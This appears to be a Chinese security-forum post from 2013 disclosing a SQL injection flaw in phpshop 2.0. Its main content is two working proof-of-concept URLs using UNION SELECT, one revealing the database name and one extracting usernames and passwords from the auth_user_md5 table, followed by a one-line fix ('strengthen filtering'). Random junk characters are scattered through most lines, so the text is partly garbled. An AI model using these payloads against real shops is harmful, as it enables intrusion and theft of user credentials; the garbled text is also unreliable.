找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2080|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability
( I3 g$ d% Y: D; W7 H, i% D6 _
0 ^% L3 N3 b8 @$ Z5 R) K作者 : By onestree5 A. d. U3 s9 T) D
下载地址 : http://code.google.com/p/phpshop/downloads/list( H& M( N- g0 \, W- w( F+ T
测试地址: windows 7 / ubuntu
! z$ @! t3 M/ s/ P! F: C2 C+ E   V, ]( m6 [$ a3 U

  w7 H. T! K: x# }% c4 q5 PSQLi p0c:
" q; `' i7 D9 g4 A1 u2 U
( o% c% o$ k+ m7 J8 f5 _& v7 c==================  m* i  e. B! U4 H+ E+ Y0 ?

/ N* o7 l4 ^' Rhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'/ x* H; _. I& |; K3 [4 Z) j) G
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --0 ]' O) M6 V( a2 ~- s$ K+ R
# I- Z% S9 h6 }8 N
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
, K1 Z  {: D' \, J2 T) ?* }* ~$ _5 ~0 ~) z# z2 R8 h& a# y
修复:, G& ^- d' f: t2 [5 |7 R3 p4 A
加强过滤" q$ N+ r  P2 h1 Q( Z4 t& `

5 E$ J1 o" I9 I3 U/ a2 g
# @( ^# V) x2 J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表